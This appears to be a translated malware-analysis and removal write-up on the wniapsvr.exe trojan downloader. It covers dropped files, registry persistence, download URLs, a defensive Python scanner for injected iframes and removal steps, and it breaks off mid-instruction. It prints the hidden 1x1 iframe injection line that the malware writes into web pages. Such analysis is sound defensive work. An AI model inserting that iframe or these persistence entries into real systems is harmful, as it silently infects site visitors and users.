Trojan downloader wniapsvr.exe has arrived

Analysis:
File: wniapsvr.exe
Size: 24333 bytes
File Version: 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
MD5: E73C5073E03673880C62683BA24DB798
SHA1: 7A2496CBBD05F3B01D35C1DDC4A12E93D171DD9A
CRC32: 18621B7D

After the virus runs:
File changes:
Drops the file
C:\WINDOWS\system32\wniapsvr.exe

Registers the service Visual VSA WEB

Service-related registry values
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\Type: 0x00000110
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\Start: 0x00000002
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\ErrorControl: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\ImagePath: "C:\WINDOWS\system32\wniapsvr.exe -Run"
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\DisplayName: "Networ VSA"
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\ObjectName: "LocalSystem"
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\Description: "允许对TCP/IP上NetBios服务以及NetBT名称解析的支持。"

Deletes C:\WINDOWS\system32\verclsid.exe

Launches IE and connects to 222.88.91.80:80 to download trojans:
downloads http://web.xxxxxxxxxx.com/web/123.txt into %programfiles%,
reads the trojan version information it contains,
then downloads the trojans
http://web.xxxxxxxxxx.com/soft/1.exe
http://web.xxxxxxxxxx.com/soft/2.exe
http://web.xxxxxxxxxx.com/soft/3.exe
http://web.xxxxxxxxxx.com/soft/4.exe
http://web.xxxxxxxxxx.com/soft/5.exe
http://web.xxxxxxxxxx.com/soft/6.exe
http://web.xxxxxxxxxx.com/soft/7.exe
http://web.xxxxxxxxxx.com/soft/8.exe
http://web.xxxxxxxxxx.com/soft/9.exe
http://web.xxxxxxxxxx.com/soft/a.exe
http://web.xxxxxxxxxx.com/soft/b.exe
http://web.xxxxxxxxxx.com/soft/c.exe
http://web.xxxxxxxxxx.com/soft/d.exe
http://web.xxxxxxxxxx.com/soft/e.exe
http://web.xxxxxxxxxx.com/soft/f.exe
http://web.xxxxxxxxxx.com/soft/g.exe
into %program files%, naming them pro1.exe through pro16.exe

After the trojans are installed
the following files are created
C:\WINDOWS\system32\AVPSrv.dll
C:\WINDOWS\system32\dhapri.dll
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\MsIMMs32.dll
C:\WINDOWS\system32\netsrvcs.dll
C:\WINDOWS\system32\nslookupi.exe
C:\WINDOWS\system32\ntsokele.exe
C:\WINDOWS\system32\nwizwmgjs.exe
C:\WINDOWS\system32\perefic.ini
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\TIMHost.dll
C:\WINDOWS\system32\upxdnd.dll
C:\WINDOWS\system32\windhcp.ocx
C:\WINDOWS\system32\wniapsvr.exe
C:\WINDOWS\AVPSrv.exe
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\MsIMMs32.exe
C:\WINDOWS\TIMHost.exe
C:\WINDOWS\upxdnd.exe
C:\Program Files\Internet Explorer\PLUGINS\System64.Jmp
C:\Program Files\Internet Explorer\PLUGINS\System64.Sys

hide.exe and autorun.inf are created on every partition; sysauto.exe is also created on drive E:
sysauto.exe is associated with C:\Program Files\Internet Explorer\PLUGINS\System64.Jmp
and C:\Program Files\Internet Explorer\PLUGINS\System64.Sys; it is a password-stealing trojan

hide.exe is associated with C:\WINDOWS\system32\RemoteDbg.dll

Worth noting is the C:\WINDOWS\system32\nslookupi.exe component:
it infects htm, html, asp and similar web page files on every partition,
inserting the code <IFRAME SRC=http://mm.xxxxxx.com/abc.htm width=1 height=1 frameborder=0></IFRAME> into them
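To show what that infection looks like from the defender's side, here is an added example (not code from the original post) that finds and strips hidden iframes of the kind nslookupi.exe injects. It generalizes slightly beyond the exact string above: any iframe whose width and height are both 0 or 1 pixels, or which is hidden with CSS, is treated as injected. The sample page is constructed; mm.xxxxxx.com is the masked domain from the analysis, not a real indicator.

```python
"""Find and strip the hidden 1x1 IFRAME that the nslookupi.exe component
writes into .htm/.html/.asp files.

Added example for this writeup, not code from the original post."""
import os
import re
import shutil
import sys

WEB_EXTENSIONS = {".htm", ".html", ".asp"}

# A complete <iframe ...></iframe> element, any case, attributes in any order.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>\s*</iframe\s*>", re.IGNORECASE | re.DOTALL)
# width=1 / height="1" attributes, quoted or bare.
DIM_RE = re.compile(r"""\b(width|height)\s*=\s*["']?(\d+)""", re.IGNORECASE)
# CSS tricks that hide a frame without shrinking it.
STYLE_HIDDEN_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)


def is_hidden_iframe(tag):
    """True when the frame cannot be seen: both dimensions are 0 or 1 px,
    or it is hidden via CSS. Such frames exist only to load something
    silently, which is exactly what the injected code above does."""
    dims = {name.lower(): int(value) for name, value in DIM_RE.findall(tag)}
    tiny = "width" in dims and "height" in dims and max(dims["width"], dims["height"]) <= 1
    return tiny or STYLE_HIDDEN_RE.search(tag) is not None


def find_injected_iframes(html):
    """Return the text of every hidden iframe element in a document."""
    return [m.group(0) for m in IFRAME_RE.finditer(html) if is_hidden_iframe(m.group(0))]


def strip_injected_iframes(html):
    """Return (cleaned_html, removed_count); visible iframes are left alone."""
    removed = 0

    def drop_if_hidden(match):
        nonlocal removed
        if is_hidden_iframe(match.group(0)):
            removed += 1
            return ""
        return match.group(0)

    return IFRAME_RE.sub(drop_if_hidden, html), removed


def scan_tree(root, clean=False):
    """Walk root and return {path: [hidden iframes]} for infected web files.
    With clean=True each infected file is backed up to <name>.bak and the
    hidden frames are removed in place."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in WEB_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            # latin-1 round-trips every byte unchanged, so GBK-encoded pages
            # (common on the systems this trojan targeted) are not corrupted.
            with open(path, "r", encoding="latin-1") as fh:
                text = fh.read()
            found = find_injected_iframes(text)
            if not found:
                continue
            hits[path] = found
            if clean:
                shutil.copy2(path, path + ".bak")
                cleaned, _count = strip_injected_iframes(text)
                with open(path, "w", encoding="latin-1") as fh:
                    fh.write(cleaned)
    return hits


# Constructed sample page: one legitimate visible frame plus the injected loader.
SAMPLE_PAGE = (
    "<html><body><h1>Welcome</h1>\n"
    '<iframe src="/news.htm" width="300" height="200"></iframe>\n'
    "<IFRAME SRC=http://mm.xxxxxx.com/abc.htm width=1 height=1 frameborder=0></IFRAME>\n"
    "</body></html>\n"
)

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, frames in scan_tree(sys.argv[1], clean="--clean" in sys.argv[2:]).items():
            print("%s: %d hidden iframe(s)" % (path, len(frames)))
    else:
        print(find_injected_iframes(SAMPLE_PAGE))
```

Run it with a drive root as the first argument to report infected files, and add --clean to strip the frames after writing a .bak copy; with no arguments it runs against the constructed sample page.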

The relevant items in the SREng log are as follows
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<upxdnd><C:\WINDOWS\upxdnd.exe> []
<Kvsc3><C:\WINDOWS\Kvsc3.exe> []
<TIMHost><C:\WINDOWS\TIMHost.exe> []
<MsIMMs32><C:\WINDOWS\MsIMMs32.exe> []
<AVPSrv><C:\WINDOWS\AVPSrv.exe> []
<Microsoft Autorun4><C:\WINDOWS\system32\nwizwmgjs.exe> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
<AppInit_DLLs><dhapri.dll> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{12311A42-AC1B-158F-FD32-5674345F23A1}><C:\WINDOWS\system32\dhapri.dll> []
<{754FB7D8-B8FE-4810-B363-A788CD060F1F}><C:\Program Files\Internet Explorer\PLUGINS\System64.Sys> []
Services
[Remote Help Session Manager / Rasautol][Stopped/Auto Start]
<C:\WINDOWS\system32\ntsokele.exe><N/A>
[Networ VSA / Visual VSA WEB][Stopped/Auto Start]
<C:\WINDOWS\system32\wniapsvr.exe -Run><Microsoft Corporation>
Processes
[PID: 1748 / Administrator][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[C:\WINDOWS\system32\dhapri.dll] [N/A, ]
[C:\Program Files\Internet Explorer\PLUGINS\System64.Sys] [N/A, ]
[C:\WINDOWS\system32\upxdnd.dll] [N/A, ]
[C:\WINDOWS\system32\Kvsc3.dll] [N/A, ]
[C:\WINDOWS\system32\AVPSrv.dll] [N/A, ]
[C:\WINDOWS\system32\MsIMMs32.dll] [N/A, ]
[C:\WINDOWS\system32\TIMHost.dll] [N/A, ]
[C:\WINDOWS\system32\nwizwmgjs.dll] [N/A, ]

Removal method:
First rename C:\WINDOWS\system32\dhapri.dll to some other name,
then reboot into Safe Mode,
open SREng,
and under Startup Items > Registry delete the following items
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<upxdnd><C:\WINDOWS\upxdnd.exe> []
<Kvsc3><C:\WINDOWS\Kvsc3.exe> []
<TIMHost><C:\WINDOWS\TIMHost.exe> []
<MsIMMs32><C:\WINDOWS\MsIMMs32.exe> []
<AVPSrv><C:\WINDOWS\AVPSrv.exe> []
<Microsoft Autorun4><C:\WINDOWS\system32\nwizwmgjs.exe> []

In "Startup Items" - "Services" - "Win32 Services Applications", click "Hide certified Microsoft items",
select the following items, click "Delete Service", then click "Set", and in the pop-up